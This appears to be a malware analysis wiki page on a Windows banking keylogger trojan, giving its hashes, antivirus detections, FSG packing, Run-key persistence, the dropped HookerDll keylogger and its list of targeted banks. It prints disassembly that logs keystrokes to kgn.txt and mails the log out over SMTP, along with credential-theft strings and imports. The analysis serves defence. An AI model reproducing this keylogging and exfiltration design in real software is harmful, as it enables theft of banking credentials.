Description

Summary

INCOMPLETE SECTION OR ARTICLE

This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Identification

MD5	0d17e183c730047bf109a8310e78009e
SHA1	b56cfb469afc44b404871a2841a28c00f019e3ad
SHA256	afc6422a2fa81952373fcdd60846b719e30cb85be5ad3dfb67f5b103c321ed58
ssdeep	96:5yZpVAYPpVsPxSQqggM2EjlBm8eyK7RMv05waJHqPOvj:5yDmipOJSQqNJKlW9k4H1j
imphash	87bed5a7cba00c7e1f4015f1bdae2183
File size	4.6 KB ( 4736 bytes )
File type	Win32 EXE
Magic literal	MS-DOS executable, MZ for MS-DOS

Antivirus detection

Antivirus	Result	Update
AVG	PSW.Agent.A	20140220
Ad-Aware	Trojan.Spy.Agent.D	20140221
Agnitum	TrojanSpy.Agent!WgM5ZpzSbf8	20140220
AntiVir	TR/Bytever.A.DRP	20140221
Antiy-AVL	Trojan[Banker]/Win32.Banker	20140219
Avast	Win32:Stavin [Trj]	20140221
Baidu-International	Trojan.Win32.Banker.aQk	20140221
BitDefender	Trojan.Spy.Agent.D	20140221
Bkav	W32.Clodac4.Trojan.687e	20140220
CAT-QuickHeal	TrojanBanker.Banker.a	20140221
CMC	Generic.Win32.0d17e183c7!MD	20140220
Commtouch	W32/Fedpo.LFLJ-5425	20140221
Comodo	TrojWare.Win32.Spy.Agent.D	20140221
DrWeb	Trojan.PWS.Pentas	20140221
ESET-NOD32	Win32/Spy.Agent.D	20140221
Emsisoft	Trojan.Spy.Agent.D (B)	20140221
F-Prot	W32/Fedpo.A@bd	20140221
F-Secure	Trojan.Spy.Agent.D	20140221
Fortinet	W32/Banker.AW!tr	20140221
GData	Trojan.Spy.Agent.D	20140221
Ikarus	Trojan-Spy.Win32.Banker.A	20140221
Jiangmin	Trojan/Banker.Banker.nus	20140221
K7AntiVirus	Trojan ( 0036e6f71 )	20140220
K7GW	Trojan ( 0036e6f71 )	20140220
Kaspersky	Trojan-Banker.Win32.Banker.a	20140221
Kingsoft	Win32.Troj.Keylogger.a.(kcloud)	20140221
McAfee	Keylog-Stawin	20140221
McAfee-GW-Edition	Heuristic.BehavesLike.Win32.Suspicious-BAY.G	20140221
MicroWorld-eScan	Trojan.Spy.Agent.D	20140221
Microsoft	PWS:Win32/Agent	20140221
NANO-Antivirus	Trojan.Win32.Banker.dbvx	20140220
Norman	Suspicious_F.A	20140221
Panda	Trj/Agent.B	20140220
Qihoo-360	Win32/Trojan.79f	20140221
Rising	PE:Trojan.Spy.Banker.crf!1173750932	20140219
SUPERAntiSpyware	Trojan.Agent/Gen-FSG	20140221
Sophos	Troj/Stawin-B	20140221
Symantec	Infostealer.Tarno.D	20140221
TheHacker	Trojan/Spy.Banker.a	20140220
TotalDefense	Win32/Elkong.E	20140221
TrendMicro	TROJ_TARNO.R	20140221
TrendMicro-HouseCall	TROJ_TARNO.R	20140221
VBA32	Trojan-Spy.Win32.Banker.a	20140220
VIPRE	BehavesLike.Win32.Malware.wsc (mx-v)	20140221
ViRobot	Trojan.Win32.Agent.4736	20140221
nProtect	Trojan-Spy/W32.Banker.4736	20140220
AhnLab-V3		20140220
ByteHero		20140221
ClamAV		20140221
Malwarebytes		20140221

Defensive capabilities

Packer

The malware is packed with FSG 1.3

Dynamic analysis

Registry keys

Following registry key has been created to ensure persistence:

Path	`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
Name	`OLE`
Type	`REG_SZ`
Value	`C:\WINDOWS\javautil.exe`

Files

Creates following file:

C:\WINDOWS\HookerDll.Dll

Copies itself into:

C:\WINDOWS\javautil.exe

Keylogger capabilities

DLL

During the infection process, the file C:\WINDOWS\HookerDll.Dll is dropped. It is a keylogger.

MD5	d9c6cff90a624ae89113ed72004ee71e
SHA1	23a69d832056b39646c9d0d66bcdbd11cde3a7e1
SHA256	340c115b7bd6bdfe1c56df75821dcfde1731cfaabe2ed44a165fd0450c4a5369
ssdeep	48:KYLLvDajnqKFU9TVMotGVBxgbzuJMR0qr0nTMp3GmDzo:rPvKxFU9TVM4ubgbzumyY0nTMpFo
imphash	e0a3278cddafa2165c7e46c980ac5195
File size	5.0 KB ( 5120 bytes )
File type	Win32 DLL
Magic literal	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Activity logged to kgn.txt

Captured keystrokes when the victim conducts banking transactions

.data:10003000 ; char aWestpac[]
.data:10003000 aWestpac        db 'Westpac',0          ; DATA XREF: StartAddress+18�o
.data:10003000                                         ; fn+CD�o ...
.data:10003008 aAnz            db 'ANZ',0
.data:1000300C aBendigo        db 'bendigo',0
.data:10003014 aBendigo_0      db 'Bendigo',0
.data:1000301C aEBendigo       db 'e-bendigo',0
.data:10003026 aEBendigo_0     db 'e-Bendigo',0
.data:10003030 aCommbank       db 'commbank',0
.data:10003039 aCommonwealth   db 'Commonwealth',0
.data:10003046 aNetbank        db 'NetBank',0
.data:1000304E aCitibank       db 'Citibank',0
.data:10003057 aBankOfAmerica  db 'Bank of America',0
.data:10003067 aEGold          db 'e-gold',0
.data:1000306E aEBullion       db 'e-bullion',0
.data:10003078 aEBullion_0     db 'e-Bullion',0
.data:10003082 aEvocash        db 'evocash',0
.data:1000308A aEvocash_0      db 'EVOCash',0
.data:10003092 aEvocash_1      db 'EVOcash',0
.data:1000309A aIntgold        db 'intgold',0
.data:100030A2 aIntgold_0      db 'INTGold',0
.data:100030AA aPaypal         db 'paypal',0
.data:100030B1 aPaypal_0       db 'PayPal',0
.data:100030B8 aBankwest       db 'bankwest',0
.data:100030C1 aBankWest       db 'Bank West',0
.data:100030CB aBankwest_0     db 'BankWest',0
.data:100030D4 aNationalIntern db 'National Internet Banking',0
.data:100030EE aCibc           db 'cibc',0
.data:100030F3 aCibc_0         db 'CIBC',0
.data:100030F8 aScotiabank     db 'scotiabank',0
.data:10003103 aScotiabank_0   db 'ScotiaBank',0
.data:1000310E aScotiaBank     db 'Scotia Bank',0
.data:1000311A aBmo            db 'bmo',0
.data:1000311E aBmo_0          db 'BMO',0
.data:10003122 aBankOfMontreal db 'bank of montreal',0
.data:10003133 aBankOfMontre_0 db 'Bank of Montreal',0
.data:10003144 aRoyalbank      db 'royalbank',0
.data:1000314E aRoyalBank      db 'Royal Bank',0
.data:10003159 aRoyalbank_0    db 'RoyalBank',0
.data:10003163 aTdwaterhouse   db 'tdwaterhouse',0
.data:10003170 aTdCanadaTrust  db 'TD Canada Trust',0
.data:10003180 aTdWaterhouse   db 'TD Waterhouse',0
.data:1000318E aPresidentSChoi db 'president',27h,'s choice',0
.data:100031A1 aPresidentSCh_0 db 'President',27h,'s Choice',0
.data:100031B4 aPresidentChoic db 'President Choice',0
.data:100031C5 aSuncorpmetway  db 'suncorpmetway',0
.data:100031D3 aSuncorp        db 'Suncorp',0
.data:100031DB aMacquarie      db 'macquarie',0
.data:100031E5 aMacquarie_0    db 'Macquarie',0
.data:100031EF aIntgold_1      db 'INTgold',0
.data:100031F7 a1mdc           db '1mdc',0
.data:100031FC a1mdc_0         db '1MDC',0
.data:10003201 aTdWaterhouse_0 db 'TD Waterhouse',0
.data:1000320F aGoldmoney      db 'goldmoney',0
.data:10003219 aGoldmoney_0    db 'GoldMoney',0
.data:10003223 aGoldgrams      db 'goldgrams',0
.data:1000322D aPecunix        db 'pecunix',0
.data:10003235 aPecunix_0      db 'Pecunix',0
.data:1000323D aPecunX         db 'Pecun!x',0
.data:10003245 aHyperwallet    db 'hyperwallet',0
.data:10003251 aHyperwallet_0  db 'HyperWallet',0
.data:1000325D aWellsFargo     db 'Wells Fargo',0
.data:10003269 aBankOne        db 'Bank One',0
.data:10003272 aBanesto        db 'Banesto',0
.data:1000327A aCaixa          db 'CAIXA',0
.data:10003280 aSuntrust       db 'SunTrust',0
.data:10003289 aSunTrust       db 'Sun Trust',0
.data:10003293 aDiscoverCard   db 'Discover Card',0
.data:100032A1 aBnz            db 'BNZ',0
.data:100032A5 aWashingtonMutu db 'Washington Mutual',0
.data:100032B7 aWachovia       db 'Wachovia',0
.data:100032C0 aDesjardins     db 'desjardins',0
.data:100032CB aChase          db 'Chase',0

The activity is logged to a text file nammed kgn.txt:

.text:100011A3                 push    offset String2  ; "\\kgn.txt"
.text:100011A8                 push    offset FileName ; lpString1
.text:100011AD                 call    lstrcatA
.text:100011B2                 push    0               ; hTemplateFile
.text:100011B4                 push    0               ; dwFlagsAndAttributes
.text:100011B6                 push    4               ; dwCreationDisposition
.text:100011B8                 push    0               ; lpSecurityAttributes
.text:100011BA                 push    3               ; dwShareMode
.text:100011BC                 push    0C0000000h      ; dwDesiredAccess
.text:100011C1                 push    offset FileName ; lpFileName
.text:100011C6                 call    CreateFileA

Log file sent to a mail.ru email address

push    offset aMailFromPentas ; "MAIL FROM:<[email protected]>\r\n"
call    sub_401057	
inc     eax	
jz      loc_40118D	
call    sub_401000	
test    eax, eax	
jz      loc_40118D	
push    offset aRcptToPentasat ; "RCPT TO:<[email protected]>\r\n"
call    sub_401057	
inc     eax	
jz      short loc_40118D	
call    sub_401000	
test    eax, eax	
jz      short loc_40118D	
push    offset dword_404400	
call    sub_401057	
inc     eax	
jz      short loc_40118D	
call    sub_401000	
test    eax, eax	
jz      short loc_40118D	
push    400h            ; namelen	
push    offset ExistingFileName ; name	
call    gethostname	
push    offset ExistingFileName	
push    offset aSubjectKeylogF ; "Subject: KeyLog from (%s)\r\n\r\n"
push    offset byte_414510 ; LPSTR	
call    wsprintfA	
add     esp, 0Ch	
push    offset byte_414510	
call    sub_401057	
test    eax, eax	
jz      short loc_40118D	
push    [ebp+arg_0]	
call    sub_401057	
inc     eax	
jz      short loc_40118D	
push    offset a_       ; "\r\n.\r\n"	
call    sub_401057	
inc     eax	
jz      short loc_40118D	
call    sub_401000	
test    eax, eax	
jz      short loc_40118D	
or      edi, 1

Static analysis

Strings

Install
Uninstall
EDIT
%s\\%s
\\kgn.txt
user32.dll
kernel32.dll
wsock32.dll
advapi32.dll
SHELL32.dll
ole32.dll
wininet.dll
\r\n------------------------------\r\n\r\n
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
EHLO localhost\r\n
\r\n.\r\n
Subject: KeyLog from (%s)\r\n\r\n
MAIL FROM:<[email protected]>\r\n
RCPT TO:<[email protected]>\r\n
SOFTWARE\\Microsoft\\Windows\\CurrentVersio
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:

IAT

exe

`SHELL32` `ShellExecuteA`	`advapi32` `RegSetValueExA` `RegCreateKeyA` `RegCloseKey`	`kernel32` `lstrlenA` `CloseHandle` `CopyFileA` `CreateFileA` `DeleteFileA` `ExitProcess` `FreeLibrary` `GetModuleFileNameA` `GetModuleHandleA` `GetProcAddress` `GetWindowsDirectoryA` `GlobalAlloc` `GlobalFree` `LoadLibraryA` `LocalAlloc` `ReadFile` `WideCharToMultiByte` `WriteFile` `lstrcmpiA` `lstrcmpA` `lstrcatA`	`ole32` `CoTaskMemFree` `CoInitialize`	`user32` `TranslateMessage` `SetWindowLongA` `SetTimer` `GetMessageA` `DispatchMessageA` `CreateWindowExA` `wsprintfA`	`wininet` `FindFirstUrlCacheEntryA` `FindCloseUrlCache` `DeleteUrlCacheEntryA` `FindNextUrlCacheEntryA`	`wsock32` `gethostname` `WSAStartup` `recv` `send` `socket` `closesocket` `connect`

DLL

`kernel32.dll` `lstrlenA` `CreateThread` `GetFileSize` `SetFilePointer` `lstrcatA` `lstrcpyA` `GetWindowsDirectoryA` `WriteFile` `Sleep` `CloseHandle` `CreateFileA`	`shlwapi.dll` `StrStrIA`	`user32.dll` `EmptyClipboard` `GetForegroundWindow` `GetKeyboardState` `SetWindowsHookExA` `GetKeyNameTextA` `UnhookWindowsHookEx` `wsprintfA` `CloseClipboard` `ToAscii` `GetClipboardOwner` `GetWindowTextA` `OpenClipboard`

Comments

0d17e183c730047bf109a8310e78009e

Contents

Description

Summary

Identification

Antivirus detection

Defensive capabilities

Packer

Dynamic analysis

Registry keys

Files

Keylogger capabilities

DLL

Activity logged to kgn.txt

Log file sent to a mail.ru email address

Static analysis

Strings

IAT

exe

DLL

Comments

Share your opinion

Navigation menu

0d17e183c730047bf109a8310e78009e

Description

Summary

Identification

Antivirus detection

Defensive capabilities

Packer

Dynamic analysis

Registry keys

Files

Keylogger capabilities

DLL

Activity logged to kgn.txt

Log file sent to a mail.ru email address

Static analysis

Strings

IAT

exe

DLL

Comments

Share your opinion

Navigation menu

Search